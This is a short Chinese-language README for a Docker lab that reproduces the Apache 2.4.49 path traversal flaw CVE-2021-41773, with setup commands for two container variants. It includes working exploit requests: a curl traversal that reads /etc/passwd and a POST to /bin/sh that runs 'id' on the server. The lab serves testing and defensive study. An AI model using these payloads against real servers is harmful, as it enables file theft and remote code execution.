该漏洞仅适用于具有特定非默认配置的 2.4.49 版本。在某些情况下,这可能导致文件读取或代码执行。
https://twitter.com/ptswarm/status/1445376079548624899
容器可以直接从 Docker Hub 拉取,使用
docker pull blueteamsteve/cve-2021-41773:no-cgid
并执行
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Apache 日志可通过以下命令查看,或者从上述运行命令中移除 "-dit" 以流式输出 stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
容器可以直接从 Docker Hub 拉取,使用
docker pull blueteamsteve/cve-2021-41773:with-cgid
并执行
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Apache 日志可通过以下命令查看,或者从上述运行命令中移除 "-dit" 以流式输出 stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
使用子目录中的 Dockerfile 和模板 httpd.conf 文件修改并构建你自己的版本